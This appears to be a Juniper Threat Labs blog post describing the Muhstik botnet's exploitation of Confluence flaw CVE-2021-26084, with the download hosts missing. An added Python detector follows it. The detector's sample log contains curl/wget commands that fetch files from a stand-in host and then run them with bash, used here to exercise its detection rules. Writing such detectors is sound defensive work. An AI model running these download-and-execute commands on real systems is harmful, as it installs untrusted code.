Muhstik Botnet targeting Confluence servers with CVE-2021-26084


Official Juniper Networks Blogs


Juniper Threat Labs is seeing an ongoing attack targeting Confluence servers. On August 25, Atlassian, the company behind Confluence, disclosed the vulnerability CVE-2021-26084. A few days later, several proofs of concept exploiting this vulnerability surfaced online, including unauthenticated remote code execution (RCE). Alongside that, we began seeing active exploitation of this vulnerability in our telemetry, starting on September 02.

Most of the attacks are on port 8090, which is the default port for Confluence. 

CVE-2021-26084 attacks

A dominant attack we have seen comes from the Muhstik botnet.

CVE-2021-26084 attack from Muhstik bot

The attack will download a shell script, conf2, from and will execute it with bash. The script will download the additional binaries dk86 and dk32 from and
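The behaviour described above (a shell script fetched and run with bash, followed by the dk86 and dk32 downloads) can be hunted for in process-execution logs. The sketch below is an added example, not code from the Juniper post: the log line format, the `confluence` account name, the download tools and the `example.invalid` hosts are assumptions, and the sample lines are constructed.

```python
import re
import shlex

CAMPAIGN_FILES = {"conf2", "dk86", "dk32"}   # file names given in the article
DOWNLOADERS = {"curl", "wget"}               # assumption: the article does not name the tool
SHELLS = {"bash", "sh"}
LINE_RE = re.compile(r'^(\S+) user=(\S+) cmd="(.*)"$')   # hypothetical log format

# Constructed sample lines (not taken from the article or from real telemetry).
SAMPLE_LOG = """\
2021-09-02T10:00:01Z user=confluence cmd="curl -s -o /tmp/conf2 http://files.example.invalid/conf2"
2021-09-02T10:00:02Z user=confluence cmd="bash /tmp/conf2"
2021-09-02T10:00:03Z user=confluence cmd="wget -q http://files.example.invalid/dk86"
2021-09-02T10:00:04Z user=confluence cmd="curl -s -o /tmp/u.sh http://files.example.invalid/renamed"
2021-09-02T10:00:05Z user=confluence cmd="bash /tmp/u.sh"
2021-09-02T10:00:06Z user=admin cmd="vi /home/admin/conf2.txt"
2021-09-02T10:00:07Z user=confluence cmd="bash /opt/tools/backup.sh"
"""

def basename(token):
    return token.rstrip("/").rsplit("/", 1)[-1]   # last component of a path or URL

def scan(log_text):
    """Return (timestamp, user, rule, command) for each suspicious process event."""
    alerts = []
    downloaded = {}                               # user -> basenames fetched so far
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue                              # skip lines in another format
        ts, user, cmd = m.groups()
        try:
            argv = shlex.split(cmd)
        except ValueError:
            argv = cmd.split()                    # unbalanced quotes: fall back
        if not argv:
            continue
        prog = basename(argv[0])
        names = {basename(a) for a in argv[1:] if not a.startswith("-")}
        if prog in DOWNLOADERS:
            downloaded.setdefault(user, set()).update(names)
        if names & CAMPAIGN_FILES:                # exact name match from the article
            alerts.append((ts, user, "campaign-filename", cmd))
        elif prog in SHELLS and names & downloaded.get(user, set()):
            alerts.append((ts, user, "shell-runs-download", cmd))   # survives renaming
    return alerts

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

The second rule correlates per user, so a shell running a file that the same account just downloaded is still flagged when the file names differ from those in the article.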
